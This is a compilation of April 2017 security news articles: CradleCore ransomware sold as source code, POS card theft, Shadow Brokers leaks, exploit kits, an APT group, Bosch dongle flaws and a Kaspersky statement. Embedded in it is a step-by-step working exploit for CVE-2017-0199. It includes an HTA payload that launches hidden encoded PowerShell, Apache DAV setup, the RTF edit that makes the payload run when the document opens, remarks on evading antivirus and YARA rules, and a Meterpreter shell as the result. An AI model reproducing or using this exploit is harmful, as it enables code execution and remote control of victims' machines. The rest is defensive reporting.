“Typically, ransomware is monetized by developers using the RaaS business model. If that doesn’t work, only then the will the developers consider selling the source code.” reads the analysis published by Forcepoint.

CradleCore is offered as a C++ source code with PHP server scripts and a payment panel. It started to be sold on a few Tor-based sites over two weeks ago for a negotiable price starting at 0.35 BTC (approximately 428 USD)”

According to the experts, this model of sale will lead to the development of new variants derived from CradleCore.

The ransomware is offered with a relatively complete feature set, it uses Blowfish for file encryption and allows offline encryption too.

The malicious code implements an anti-sandbox mechanism and communicates to command and control server via a Tor2Web gateway.

Once infected a system, the CradleCore ransomware encrypts files and to drops a ransom note on the system. When the malware encrypts the files it appends the .cradle extension to them.

CradleCore Ransomware

Experts from Forcepoint that analyzed the readme file, believe that the author of the malware is a developer without a significant experience in malware coding.

The researchers discovered more about the author by conducting further analysis on the advertisement site for CradleCore ransomware.

“While the advertisement site for CradleCore is hosted on the dark web, the site’s Apache server status page appears to be accessible to the public. The logs appeared to show that the Apache server hosting the Onion site has a second Virtual Host (VHost) hosting a clearnet website. VHosts, to those unfamiliar, allow multiple websites to be hosted on a single machine and IP address:” reads the analysis.

“The Linode-assigned IP address hosting the clearnet site appears to be exclusive-use. Essentially, this could mean either that the server is compromised and is abused to host the CradleCore website or that the clearnet website and CradleCore belong to the same owner.

Digging around the contents of that clearnet website led us to the website owner’s personal site who appears to be working as a freelance software developer. From the information available on his personal website we managed to find his Twitter and LinkedIn account where it is indicated that he is a C++ programmer.”

Of course, this means that the owner of the clearnet site that is used to sell the ransomware is linked to a freelance C++ developer, but there is no proof that he is also the coder.

Concluding Forcepoint researchers believe the ransomware may be the first project of a novice malware developer.

“CradleCore is yet another new ransomware product that is available to cybercriminals. It is being sold as source code which potentially suggests that CradleCore may be a first- or side-project of someone with limited experience of malware business models looking for extra income. It also means that anyone who purchases it will not only be able to update the ransomware but also share the source code to others,” Forcepoint says.


Windows attacks via CVE-2017-0199 – Practical exploitation! (PoC)
18.4.2017 securityaffairs Exploit

The Security expert David Routin (@Rewt_1) has detailed a step by step procedure to exploit the recently patched cve-2017-0199 vulnerability exploited in Windows attacks in the wild.
Introduction
Since several days the security community has been informed thanks to FireEye publication of different malware campaigns (Dridex…) leveraging the CVE-2017-0199.
Several other publications were related to this vulnerability but no working exploit was published.
After digging a while I found the way to exploit this vulnerability in an easy way, which seems to be a bit different than the current works already done by other researchers.

I decided to publish this work as Microsoft officially published a patch on 11 of Apr 2017.

Technical background
It is possible to include OLEv2 links to existing documents.
These objects (once included) will reflect the current content of the source link once loaded in the document.
What is amazing is that if you try to include HTA link as an OLEv2 object it will be executed once (at the creation) but WinWord will return an error like:
CVE-2017-0199 1
The problem in this case is that the HTA file will not be persistent (to make it persistent you would have had to Link it with file + create icon but we want to be stealth and to have autorun right ?)
After thinking a while I started by thinking how to handle a real, not malicious OLE object link to a remote RTF file… To achieve i had to play a little bit with content-type and DAV module in Apache to serve my file in the “proper” Microsoft Office expected way… (this will be discussed in next chapters).
From there, I will have a valid embedded Object link automatically updated after each open of my document!

Next step? Modify the document at the source with my payload in HTA!?!

In this scenario, I was able to:
– Create a dynamic OLEv2 object link for a real RTF file
– Modify the RTF at the source with my payload
– Bypass the error generated if I wanted to create a direct link to HTA document

Another issue? The OLE object needed to be activated automatically!

I had much help to solve all these issues relaying on different articles in the reference part! Thanks to Didier Stevens blog, Vincent Yiu (mainly inspired by its article), Nvisio labs, FireEye and obviously… Microsoft 🙂

Step 1

Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript)
Let’s call it “ms.hta”
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Bonjour</title>
<script language="VBScript">
Set owFrClN0giJ = CreateObject("Wscript.Shell")
Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"
End If
</script>
<hta:application
id="oHTA"
applicationname="Bonjour"
application="yes"
>
</hta:application>
</head>
<div>
<object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
</object></div>
<body>
</body>
</html>
Step 2

Create a simple RTF document using Winword with the any random content. (in our example the string “This is my official and legit content”)

Call it “ms.rtf”

Step 3

Push these 2 files on a webserver you have full control on.
We supposed it will be stored in /var/www/html

Now we have to configure Apache to be able to include the ms.rtf as a link

a2enmod dav
a2enmod dav_fs
a2enmod dav_lock
a2enmod headers
service apache2 restart
The following directive will:
– Add “Content-Type application/rtf to all files in /ms
– Allow the PROPFIND request performed by Microsoft Office

Modify virtualhost and include:

<Directory /var/www/html/ms/>
Header set Content-Type "application/rtf"
</Directory>
<Directory />
Dav on
</Directory>
service apache2 restart

Step 4

Create a simple RTF document using Winword “exploit.rtf” This will be our exploit !

Insert -> Object

CVE-2017-0199 2
CVE-2017-0199 Creation of OLEv2 external link
After clicking OK you will get the content of the “ms.rtf” file which just contains a random string..

Save the file as “exploit.rtf”

CVE-2017-0199 3
CVE-2017-0199 Olev2 link object created

At this step we can close Winword and go to the next step for changing the content of ms.rtf with the HTA payload…
Step 5

The following step will :
– change the ms.rtf that we have included with the custom HTA payload
– The web server will send a “application/hta” content-type… this will be interpreted by the Winword client which will run mshta to handle this content-type and execute our payload

cat /var/www/html/ms/ms.hta > /var/www/html/ms.rtf

vi /etc/apache2/sites-enables/000-default
Change -> application/rtf to application/hta
like:

<Directory /var/www/html/ms/>
Header set Content-Type "application/hta"
</Directory>

service apache2 restart
Step 6

At this step, if the user opens the “exploit.rtf” file he will have to double click on the link object to launch the attack…

If we want the OLE object to be loaded automatically at the opening of the document we have to edit the exploit.rtf file and change:

to
\object\objautlink\objupdate\rsltpict……………………..

At this step the exploit is built.

Exploitation:

Once the user open the document the OLE object is updated through the link and mshta is execute thanks to the application/hta content-type delivered by the server
Result: code is executed!

Meterpreter is here!
CVE-2017-0199 4

We don’t care about the warning as the code was already executed…

CVE-2017-0199 5
CVE-2017-0199 Exploited ! warning after execution

Detection using current AV/published YARA rules

From my personal tests it seems that this method is not currently catched by AV (Defender already have signature for CVE-2017-0199)

Additionnally current published yara rules does not match this exploit

rule rtf_objdata_urlmoniker_http {
strings:
$header = “{\\rtf1”
$objdata = “objdata 0105000002000000” nocase
$urlmoniker = “E0C9EA79F9BACE118C8200AA004BA90B” nocase
$http = “68007400740070003a002f002f00” nocase
condition:
$header at 0 and $objdata and $urlmoniker and $http
}

Indeed urlmoniker does not match, which will never trigger this Yara rule.

References

https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html
https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/


Cybercriminals Steal Card Data From Shoney's Restaurants

18.4.2017 securityweek Incindent
Cybercriminals managed to steal payment card data from nearly 40 Shoney’s restaurants after planting malware on their point-of-sale (PoS) systems.

Security blogger Brian Krebs learned from his sources in the financial industry that a fraud pattern had been spotted on cards used at locations of the Nashville, Tennessee-based restaurant chain. Shortly after Krebs published a blog post on Friday, Best American Hospitality Corp. confirmed that some of the Shoney's corporate affiliated restaurants it manages and operates had been hit by a data breach.

The company hired Kroll Cyber Security to investigate the incident. The security firm determined that hackers had remotely installed malware on payment processing systems at tens of Shoney’s restaurants.

The malware was designed to steal data such as cardholder name, card number, expiration date and internal verification code as it was being routed through the infected device. Investigators determined that in some cases the malware may not have obtained cardholder names.

Kroll’s investigation showed that some of the impacted locations were breached on December 27, 2016, while others were first compromised on January 11. Best American Hospitality is confident that the breach was contained by March 6.

As of last year, there were roughly 150 company-owned and franchised Shoney's restaurants across 17 U.S. states. Best American Hospitality said the breach affected 37 locations in South Carolina, Tennessee, Louisiana, Alabama, Georgia, Mississippi, Virginia, Missouri, Florida and Arkansas.

Several other major restaurant chains reported suffering data breaches in the past months, including CiCi’s, Arby’s, Wendy’s and Noodles & Company.

IHG warns of card-stealing malware at front desks

In addition to restaurants, several major hotel chains also reported being hit by card-stealing malware. One of them is InterContinental Hotels Group (IHG), which in early February confirmed that systems processing payments for bars and restaurants at 12 of the properties it manages had been compromised.

Now, IHG has informed customers that it has identified malware which may have stolen data from cards used at hotel front desks. The malware is believed to have stolen data between September 29 and December 29, 2016, but the company only received confirmation that the threat had been neutralized in February and March, when the affected properties were investigated.


CradleCore Ransomware Sold as Source Code

18.4.2017 securityweek Ransomware

The author of a new piece of ransomware is selling their creation on underground forums as source code, Forcepoint security researchers have discovered.

Dubbed CradleCore, the threat breaks from the ransomware-as-a-service (RaaS) business model that many miscreants have adopted lately, and allows “customers” to take advantage of customizable source code.

The ransomware is provided as a C++ source code, paired with the necessary PHP web server scripts and a payment panel. According to Forcepoint, the malware emerged on several Tor-based sites some two weeks ago, priced at 0.35 Bitcoin (around $400) but negotiable.

Because the ransomware’s source code is sold directly, the security company expects an increase in the number of variants stemming from CradleCore.

Upon analysis, the security researchers discovered that the malware comes with “a relatively complete feature set,” as it uses Blowfish for file encryption, features anti-sandbox defenses, supports offline encryption, and uses a Tor2Web gateway (onion.link) to communicate with its command and control (C&C) server.

After infecting a system, the ransomware proceeds to encrypt user’s files and to append the .cradle extension to them. When the encryption has been completed, the malware drops a ransom note.

According to Forcepoint, some of the words used in the readme file suggest that CradleCore’s author is not a professional malware developer, but a software developer who decided to take a shot at the ransomware scene.

After tracking the advertisement site for CradleCore to a clearnet site and a Linode-assigned IP address, the security researchers concluded that the author might indeed be a freelance software developer. Information on the developer’s personal website led to the author’s Twitter and LinkedIn accounts, which revealed that it is a C++ programmer.

However, all that Forcepoint can do at the moment is to “link the clearnet site with a freelance C++ developer and with an Onion site offering the CradleCore C++ source code for sale.” Thus, while they can provide a link between the owner of the clearnet site and the malware, they can’t attribute the ransomware to said developer, at least not “without knowledge of whether or not the Linode host itself has been compromised.”

“CradleCore is yet another new ransomware product that is available to cybercriminals. It is being sold as source code which potentially suggests that CradleCore may be a first- or side-project of someone with limited experience of malware business models looking for extra income. It also means that anyone who purchases it will not only be able to update the ransomware but also share the source code to others,” Forcepoint says.


Microsoft: Latest 'Shadow Brokers' Exploits Already Patched

18.4.2017 securityweek Exploit
The hacker group calling itself “Shadow Brokers” has made public another batch of files allegedly obtained from the NSA-linked threat actor tracked as the Equation Group. Microsoft has assured customers that these new exploits don’t affect up-to-date systems.

The Shadow Brokers recently published a password to a previously leaked file and many believed it would represent the group’s last dump. However, the hackers released another round of files on Friday, including exploits for Windows and IBM’s Lotus Domino platform. The leaked files also appear to show that the Equation Group breached the SWIFT banking network and monitored a number of Middle Eastern banks.

Microsoft has analyzed the latest dump and identified a dozen exploits targeting its Windows operating system. According to the company, some of the vulnerabilities leveraged by these exploits were patched back in 2008, 2009, 2010 and 2014.

Four of the exploits, dubbed EternalBlue, EternalChampion, EternalRomance and EternalSynergy, were addressed by Microsoft with the March 2017 security updates — a majority with the MS17-010 patch. The tech giant also pointed out that the remaining exploits do not work on Windows 7 and later, or Exchange 2010 and later.

Microsoft has not shared any information on how it learned about the vulnerabilities. However, experts believe the NSA itself may have disclosed the flaws to the company.

The Shadow Brokers published the names of the exploits leaked on Friday back in January, when they announced an auction for Windows tools. After seeing the list published in January, the NSA may have decided to alert Microsoft knowing that the exploits would likely be made public at some point.

Follow
Edward Snowden ✔ @Snowden
Microsoft doesn't credit anyone for the report behind the March patch. Was it @NSAGov? If so, it was the right call. Better late than never. https://twitter.com/botherder/status/853153945677684736 …
2:13 PM - 15 Apr 2017
531 531 Retweets 975 975 likes

It’s also worth noting that Microsoft postponed its February 2017 security updates due to an unspecified “last minute issue,” and the March patches contained fixes for several of the Equation Group exploits.

While there has been a lot of speculation as to who might be behind the Shadow Brokers — some say Russia, while others believe it could be an NSA contractor — the hackers continue to claim that their main goal is to make money. They’ve had several sales strategies, including auctions and crowdfunding, but the Bitcoin address they have provided received only 10 bitcoins.

In a brief statement they published on Friday, the hackers suggested that more files could be released this week.


The failure of the missile launch by North Korea may have been caused by US cyber attack
17.4.2017 securityaffairs CyberWar

The failure of the missile launch made the North Korea may have been thwarted by a cyber attack powered by the US Cyber Command.
The crisis between the US and North Korea is increasing, Donald Trump warns his military may ‘have no choice’ to strike the rogue state.

According to The Sun, US cyber soldiers may have hacked the control system of the rocket causing the failure of the launch.
The nuclear test ballistic missile exploded within five seconds of the launch, according to the newspaper the US agents have used a stealth malware that caused a massive malfunction.

The launch occurred from near the port city of Sinpo, Kim Jong-un ordered it defiance of President Trump sending a naval task force to the region.

The US naval force in the area, led by the aircraft carrier USS Carl Vinson, is equipped with rockets capable of intercepting missiles, but they were not deployed.

It was a medium-range ballistic rocket, likely a Nodong, the experts highlighted that North Korea is forced to import the high-tech electronics used in its missiles, so it is likely that US hackers compromised the supply chain implanting an undetectable malware.

According to some experts, North Korea is vulnerable to cyber attacks because its scientists have to import electronic hardware.

The experts believe that US cyber units may have detected the launch and sent the instructions to the malware via satellite from the US National Security Agency headquarters in Maryland.

North Korea missile launch failed
Source; The Sun

Fantasy or reality?

A similar attack requests a huge effort in terms of HUMINT and technical activities, but it is perfectly feasible.

“It is perfectly feasible the US brought down this missile.” said Defence analyst Paul Beaver.

“Their cyber warfare capabilities are now highly advanced.

“As soon as military satellites watching Sinpo detected an imminent launch, a team at the National Security Agency would have got to work.”

“It’s possible for them to have sent a signal directly to the missile from Maryland which effectively zapped it out of the sky.”

“North Korea has had a string of launch failures and it may be no coincidence that they have happened as the US went to cyber war.”

President Trump did not comment the Kim’s missile failure.

Analysts believe that Kim will punish military commanders involved in the failed operation.

Kim has a history of punishing failure with terrible retribution, including executing his own officials with anti-aircraft guns.

Giving a look at the North Korea’s military programme we can notice a long series of technical failures, a part of the intelligence community attribute the incident to cyber attacks powered by the US Cyber Command.

Other ballistic tests failed in the last weeks, medium-range North Korean rockets crashed and exploded.

“Last year a Musudan missile fired to mark the anniversary of the birth of Kim’s grandfather Kim Il-sung blew up so soon after take-off it wrecked its launcher.” reported The Sun.

“In November 2015 an attempt to launch a ballistic missile from a submarine ended in failure when the weapon disintegrated under­water.”

“There are many things that can go wrong but it would be impossible to tell from outside if something had affected the internal guidance or control systems.” said Defence analyst Lance Gatling

“It has been openly mentioned that there is a possibility that the North’s supply chain for components has been deliberately infected, and they might never know.”


Microsoft biannual transparency report – US foreign intelligence surveillance requests more than doubled
17.4.2017 securityaffairs BigBrothers

Microsoft published the biannual transparency report – The number of US foreign intelligence surveillance requests more than doubled.
Microsoft shared data included in the biannual transparency report, the IT giant received more than double what the company said it received under the Foreign Intelligence Surveillance Act (FISA) during the preceding six months.

Microsoft Corp announced it had received in the first half of 2016 at least a thousand surveillance requests from the US Government that sought user content for foreign intelligence purposes.

This is the highest number of request Microsoft has listed since 2011, when it began tracking such government surveillance orders.

Privacy advocates in Congress are concerned about such increase and call for reforms to any FISA legislation in order to limit US Government from searching of American data that is incidentally collected during foreign surveillance operations.

FISA orders have to be approved by judges at the Foreign Intelligence Surveillance Court and they are usually kept secret.

“Microsoft said it received between 1,000 and 1,499 FISA orders for user content between January and June of 2016, compared to between 0 and 499 during both January-June 2015 as well as the second half of 2015.” reported the Reuters.

The Microsoft biannual transparency reports consists of the Law Enforcement Requests Report, U.S. National Security Orders Report and Content Removal Requests Report.

“Microsoft received 1,000-1,499 FISA orders seeking content disclosures affecting 12,000-12,499 accounts, compared to the 0-499 FISA orders seeking disclosure of content impacting 17,500-17,999 accounts reported for the previous period.” states Microsoft. “We received 0-499 National Security Letters in the latest reporting period, which remains unchanged from the previous period.”

Microsoft biannual transparency report

A portion of the FISA will expire at the end of the year unless lawmakers vote to reauthorize it.

Microsoft also released for the first time a national security letter (NSL), a sort of warrantless surveillance order used by the FBI to access data of a customer of the company.

“As part of the release of these reports, we are also disclosing a National Security Letter (NSL) we received from the Federal Bureau of Investigation (FBI) in 2014, which sought data belonging to a customer of our consumer services.” states Microsoft,

Microsoft isn’t the unique company that disclosed an NSL, Twitter and Yahoo in the recent months made the same under a transparency measure of the USA Freedom Act.


Terror EK rising in the threat landscape while Sundown EK drops
17.4.2017 securityaffairs Exploit

The Sundown EK has been inactive since early this year, the Terror EK is being very popular in the cybercriminal ecosystem.
One year ago the Angler EK and Nuclear EK disappeared from the threat landscape, while the Sundown EK was conquering the criminal underground.

What’s happening now?

The Sundown EK has been inactive since early this year, the Terror EK is being very popular in the cybercriminal ecosystem.

Last week, Cisco Talos published an analysis of Sundown EK, the expert detailed the improvements of the EK that presented many similarities with the RIG exploit kit.

“Sundown is an exploit kit in transition, it has stopped using calling cards and other easily ways to identify its activity. It is one of the few exploit kits adding any new exploits to their arsenal, albeit stolen. At the same time they consistently steal exploits and technologies from other people and competitors.” reads the analysis of the Talos group. “The exploit kit landscape has been struggling to find its footing since the major players have left. It still appears to be in transition with RIG and Sundown being the primary players left as an option for those looking to compromise random victims while browsing the web.”

The Sundown EK was not sophisticated like other large exploit kits.

Security experts at Talos were noticing a long inactivity of the Sundown EK, also variant of the kit was disappeared from the scene, including Bizarro and Greenflash.

This silence leads the experts into believing that threat actor ceased the operations.

“Many security researchers tracking exploit kits have noted the lack of Sundown EK activity for several weeks now. A post from Cisco’s Talos team came off as a bit of a surprise at the end of March (Threat Spotlight: Sundown Matures), but any doubts were squashed by this tweet on April 8th (Sundown (Beps) and Nebula out ? More than one month since last hits).” reads a blog post published by MalwareBytes.

“Also, whatever happened to Bizarro and Greenflash Sundown EKs? Whether this is a temporary break or yet another dead EK, time will tell.”

Recently experts observed a significant increase of hacking campaigns leveraging the Terror EK.

Because of similarities with Sundown EK, experts at MalwareBytes initially thought that the Terror EK was simply a new variant of Sundown, but further investigation revealed that it was actually from a different actor (so-called Terror EK by Trustwave).

The Terror EK was advertised on various underground forums by a hacker with the online moniker @666_KingCobra that is offering it for sale under different names (i.e. Blaze, Neptune, and Eris).

Experts at Malwarebytes Labs said that the Terror EK was used in a malvertising campaign distributing the Smoke Loader by exploiting Internet Explorer, Flash, and Silverlight exploits.

The Terror EK was also involved in a newer campaign using a different landing page that distributes the Andromeda malware.

The compromised websites are leveraged to redirect to the exploit kit landing page via server 302 redirect call and done via script injection.

Terror EK

“Sundown EK was notorious for stealing exploits from others and the tradition continues with more copy/paste from the ashes of dead exploit kits. If this harvesting was done on higher grade EKs, we would have a more potent threat but this isn’t the case here,” Malwarebytes concludes.


Hacked Files Suggest NSA Penetrated SWIFT, Mideast Banks

16.4.2017 securityweek BigBrothers
Files released by the mysterious hacker Shadow Brokers suggested Friday the US National Security Agency had penetrated the SWIFT banking network and monitored a number of Middle East banks.

The files, according to computer security analysts, also showed the NSA had found and exploited numerous vulnerabilities in a range of Microsoft Windows products widely used on computers around the world.

Analysts generally accepted the files, which show someone exploiting so-called "zero-day" or hitherto unknown vulnerabilities in common software and hardware, came from the NSA.

They are believed stolen from a hyper-secret hacking unit dubbed the "Equation Group" at the key US signals intelligence agency.

"The tools and exploits released today have been specifically designed to target earlier versions of Windows operating system," said security specialist Pierluigi Paganini on the Security Affairs website.

They "suggest the NSA was targeting the SWIFT banking system of several banks around the world."

The files appear to indicate that the NSA had infiltrated two of SWIFT's service bureaus, including EastNets, which provides technology services in the Middle East for the Belgium-based SWIFT and for individual financial institutions.

Via that entry point the agency appears to have monitored transactions involving several banks and financial institutions in Kuwait, Dubai, Bahrain, Jordan, Yemen and Qatar.

In a statement on its website EastNets rejected the allegations.

"The reports of an alleged hacker-compromised EastNets Service Bureau network is totally false and unfounded," it said.

"We can confirm that no EastNets customer data has been compromised in any way."

SWIFT said in a statement that the allegations involve only its service bureaus and not its own network.

"There is no impact on SWIFT's infrastructure or data, however we understand that communications between these service bureaus and their customers may previously have been accessed by unauthorized third parties."

"We have no evidence to suggest that there has ever been any unauthorized access to our network or messaging services."

Shadow Brokers first surfaced last year offering for sale a suite of hacking tools from the NSA. There were no takers at the price stated of tens of millions of dollars, and since then the hacker or hackers have leaked bits of the trove for free.

Analysts say many of the exploits revealed appear to be three years old or more, but have some unknown vulnerabilities that could still be used by other hackers.

No one has yet discovered the identity of Shadow Brokers, or of the hackers that gained access to the NSA materials.


Cerber Dominates Ransomware Charts

16.4.2017 securityweek Virus
Cerber, one of the most active malware families over the past year, has increased its share of the ransomware market to 87% in the first quarter of 2017, Malwarebytes Labs reports.

The threat accounted for 70% of the ransomware market in January, but increased its presence in February and March, amid a major decrease in Locky attacks, from 12% in January to less than 2% in March, Malwarebytes’ Cybercrime tactics and techniques Q1 2017 report (PDF) reads.

While Locky has been fading away, new ransomware families such as Spora and Sage have managed to grab some market share. Cerber dominates all other threats in its category at the moment, and its market domination is on par with that of the now defunct TeslaCrypt during its most popular timeframe (the first half of 2016).

Over the past several months, Cerber’s operators used a broad range of available distribution methods, ranging from exploit kits to the recently patched Apache Struts 2 vulnerability. The Kovter click-fraud Trojan was observed dropping Cerber earlier this year, after Betabot was dropping it in September 2016.

Cerber’s authors were also focused on improving their creation with the addition of machine learning evasion capabilities, and with improved anti-sandboxing functionality. Recently, Cyphort researchers noticed that Cerber was leveraging process hollowing for infection, where a suspended process is created and the ransomware’s code is injected in it.

“Just like TeslaCrypt, Cerber has risen to the top of the ransomware market, leaving all competitors in its dust. Again, like TeslaCrypt, Cerber can just as easily become yesterday’s news. However, there are a few factors at play with Cerber that could make its future different than that of families like TeslaCrypt and Locky,” Malwarebytes Labs notes.

Cerber is available as a Ransomware as a Service (RaaS), meaning that it is readily available even for cybercriminals without coding knowledge, but who can get involved in the distribution operation. What’s more, the malware features military-grade encryption, offline encrypting, and various other features that makes it attractive for miscreants.

The malware landscape has seen other changes as well during the first quarter of the year, such as the emergence of new macOS malware and backdoors, including a new ransomware dubbed FindZip. Researchers also discovered the first macro malware targeting Macs.

The RIG exploit kit continues to dominate its threat segment and is expected to do so in the future as well, mainly because there are only a few active toolkits, meaning that there is little competition it has to face.

Numerous malicious spam campaigns observed in the first quarter abused password-protected Office documents, in an attempt to evade auto analysis sandboxes, Malwarebytes also notes. Recently, the Ursnif banking Trojan was observed using such documents in multiple campaigns worldwide.


Callisto APT Group exploited Hacking Team surveillance tools to hack Government targets
16.4.2017 securityaffairs APT

The Callisto APT Group borrowed the source code leaked by hackers that broke into Hacking Team network.
According to F-Secure Labs, The Callisto APT Group used the HackingTeam leaked surveillance software to gather intelligence on foreign and security policy in eastern Europe and the South Caucasus.

The Callisto APT group targeted government officials, military personnel, journalists and think tanks since at least 2015.

F-Secure is still investigating the case, the experts of the company reported that the Callisto Group’s infrastructure has links with entities in China, Russia, and Ukraine.

The researchers speculate the attacker is a nation state actor:

“It is worth noting that during our investigation we uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances.” reads the report published by F-Secure. “While the targeting would suggest that the main benefactor of the Callisto Group’s activity is a nation state with a specific interest in the Eastern Europe and South Caucasus regions, the link to infrastructure used for the sale of controlled substances hints at the involvement of a criminal element. Finally, the infrastructure associated with the Callisto Group and related infrastructure contain links to at least Russia, Ukraine, and China in both the content hosted on the infrastructure, and in WHOIS information associated with the infrastructure.”

Callisto APT group

The Callisto APT Group was involved in highly targeted phishing attacks using a malware that is a variant of the Scout tool from the RCS Galileo developed by the surveillance firm HackingTeam.

The code of the surveillance tool was leaked online after hackers broke into the Hacking Team network. F-Secure experts believe the Callisto Group did not utilize the leaked RCS Galileo source code, but rather attackers used the leaked readymade installers to set up their own installation of the RCS Galileo platform.

“The process for using the leaked installers to set up an RCS Galileo installation has been described online in publicly available blogposts, making the process trivial to achieve” continues the report. “In all known malicious attachments, the final payload was a variant of the “Scout” tool from the HackingTeam Remote Control System (RCS) Galileo hacking platform.”

According to the group, the Callisto APT continues to be active, the experts observed the last malware in February 2016, meanwhile, they continue setting up new phishing infrastructure on weekly bases.

Let me suggest reading the report on the Callisto APT Group that is full of interesting info, including IoCs and mitigation strategies.


Facebook dismantled a huge spam campaign leveraging bogus accounts
16.4.2017 securityaffairs Social

Facebook disrupted an international spam campaign leveraging on bogus accounts used to create “likes” and bogus comments.
The security team at Facebook has disrupted an international spam operation after a six months investigation. The company has neutralized a coordinated campaign that was leveraging on bogus accounts used to create inauthentic likes and comments.

“Today we are taking another step to disrupt a spam operation that we have been combating for six months. It is made up of inauthentic likes and comments that appear to come from accounts located in Bangladesh, Indonesia, Saudi Arabia, and a number of other countries.” states a blog post published by Facebook.”We found that most of this activity was generated not through traditional mass account creation methods, but by more sophisticated means that try to mask the fact that the accounts are part of the same coordinated operation.”

The intent of the campaign was to deceptively increase their social network by adding new friend connections by liking and interacting primarily with popular publisher Pages on Facebook. The attacker used their network of connections to send out spam messages. A huge number of bogus accounts became dormant after liking a number of Pages, “suggesting they had not been mobilized yet to actually make connections and send spam to those people.”

Systems at Facebook were able to identify the fraudulent activities and to remove a significant volume of inauthentic likes, even if attackers used tricks to avoid detection such as the traffic redirection through “proxies” that disguised their location.

“By disrupting the campaign now, we expect that we will prevent this network of spammers from reaching its end goal of sending inauthentic material to large numbers of people.” continues Facebook.

spam campaign

As result of the Facebook activity, the experts at the company expect that 99% of impacted Pages with more than 10,000 likes will see a drop of less than 3%.

Facebook confirmed security improvement to its system to prevent any abuse of its platform, social networks are today privileged attack vectors for crooks.

“We’ve found that when people represent themselves on Facebook the same way they do in real life, they act responsibly,” said Shabnam Shaik, a company security manager.

“Fake accounts don’t follow this pattern, and are closely related to the creation and spread of spam.”


Flaws in the Bosch Drivelog Connector dongle could allow hackers to halt the engine
16.4.2017 securityaffairs Vulnerebility

Security experts discovered vulnerabilities in the Bosch Drivelog Connector dongle that could be exploited by hackers to stop the engine.
Security Researchers at automotive cybersecurity firm Argus discovered vulnerabilities in Bosch Drivelog Connect solution that can be exploited by hackers to inject malicious messages into a vehicle’s CAN bus.

The Bosch Drivelog Connect is the system that provides information about the state of a vehicle, it includes the Drivelog Connector dongle.

Drivelog Connector dongle

The Drivelog Connector dongle is connected to the OBD2 diagnostics interface of the vehicle, and a mobile application communicates with it via Bluetooth.

The researchers analyzed the protocol of communication between the mobile app and the dongle and identified two potentially serious vulnerabilities.

“The vulnerabilities allowed us to stop the engine of a moving vehicle using the Drivelog platform. On February 20th, 2017, in accordance with Argus’ responsible disclosure policy, upon uncovering the vulnerabilities we informed Bosch of our findings. On February 21st, 2017, Bosch’s Product Security Incident Response Team (PSIRT) contacted Argus and began addressing the issue.” reads the analysis published by Argus.

“In summary, the following two vulnerabilities were found:

An information leak in the authentication process between the Drivelog Connector Dongle and the Drivelog Connect smartphone application.
Security holes in the message filter in the Drivelog Connector dongle.”
One of the vulnerabilities affects the authentication process between the Drivelog Connector and the Drivelog Connect mobile app. The experts have analyzed the Android version of the mobile app.

The second flaw resides in the message filter in the Drivelog Connector dongle.

According to researchers, diagnostic messages can only be sent to the CAN bus using a valid service ID, but the attacker can use OEM-specific messages that pass the filter in order to have a physical effect on the car.

An attacker with root privileges on the driver’s mobile phone can leverage this message filter bypass to send malicious CAN messages outside of the scope a small subset of diagnostic messages (i.e., OBDII PIDs).

According to Argus, during the tests, its researchers managed to remotely stop the engine of a moving car by triggering the vulnerability.

Car vendors highlight that such kind of attack is very hard to prevent because attackers have taken over the smartphone of the legitimate driver.

Researchers from Argus have gone beyond, they devised a method to launch the attack without compromising the driver’s smartphone.

The experts discovered an information disclosure vulnerability in the authentication process between the app and the dongle that could be exploited by an attacker to connect to a targeted device without compromising the phone first.

Analyzing the authentication process, researchers discovered the dongle sends any connecting Android device various pieces of information that can be used to obtain the user-supplied authorization PIN.

The amount of data is enough to guess the PIN offline through a brute-force attack only limited in the number of possible PINs.

“Since, a Drivelog Dongle’s PIN has eight digits, there are 100 million possible PINs. A single verification requires a SHA256 calculation and a public key encryption operation. The calculations can be trivially parallelized – but the reality is, there’s no need: a modern laptop can run 100 million SHA256 computations and encryptions in roughly 30 minutes (according to independent benchmarks for the Ed25519 public-key signature system) using properly optimized software.” reads the analysis. “The time needed can be further reduced by running several brute-forcing servers in parallel.”

Once the connection has been established, the attacker can send malicious CAN bus messages from their device, instead of having to compromise the driver’s smartphone, the only limitation if that the hacker needs to be in a Bluetooth range of the targeted vehicle.

Bosch fixed the issues by introducing two-step verification in the authentication process.

“The improper authentication vulnerability in the Bluetooth communication has been mitigated by activating a two-step verification for additional users to be registered to a device. This has been implemented on the server, so no action is required by the user. To further increase security in the authentication process an application and dongle firmware update will also be released.” states the advisory published by the Bosch.

The company plans to release a firmware update for the Drivelog Connector dongle to prevent such kind of attacks.


The security is still secure

16.4.2017 Kaspersky Safety
The WikiLeaks report and Kaspersky Lab's products

Recently WikiLeaks published a report that, among other things, claims to disclose tools and tactics employed by a state-sponsored organization to break into users’ computers and circumvent installed security solutions.

The list of compromised security products includes dozens of vendors and relates to the whole cybersecurity industry. The published report includes a description of vulnerabilities in software products that can be used to bypass protection and jeopardize users’ security.

Customers’ security is a top priority for Kaspersky Lab, and as such we take any information that could undermine users’ protection very seriously. We thoroughly investigate all reported vulnerabilities.

The published report contains descriptions of two vulnerabilities in Kaspersky Lab’s products that have already been fixed. It also includes a number of mentions related to the company’s technologies and past Advanced Persistent Threat (APT) research. I’d like to take this opportunity to address possible concerns regarding the report and provide reliable first-hand information to demonstrate that no current Kaspersky Lab products and technologies are vulnerable.

Vulnerabilities in security solutions

First of all, I’d like to emphasize that the vulnerabilities in Kaspersky Lab’s products listed in the report are related to older versions of the products, and they were publicly disclosed and fixed some time ago. The current versions of our products are not vulnerable to the tools and tactics listed.

